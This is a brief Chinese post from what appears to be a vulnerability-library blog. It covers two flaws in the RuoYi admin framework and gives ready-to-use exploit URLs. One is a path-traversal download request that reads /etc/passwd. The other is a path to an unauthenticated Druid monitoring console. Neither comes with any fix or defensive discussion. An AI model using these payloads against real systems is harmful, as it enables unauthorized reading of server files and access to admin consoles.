若依_任意文件讀取&未授權訪問漏洞棉花糖2021年7月15日发布关注私信0690 # 若依 任意文件讀取&未授權訪問漏洞 ==任意文件讀取== https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd ==未授權訪問== http://xxx.xxx.xxx.xxx/prod-api/druid/index.html © 版权声明文章版权归作者所有,未经允许请勿转载。THE END漏洞库 喜欢就支持一下吧点赞0赞赏 分享QQ空间微博QQ好友海报分享复制链接收藏
请登录后查看评论内容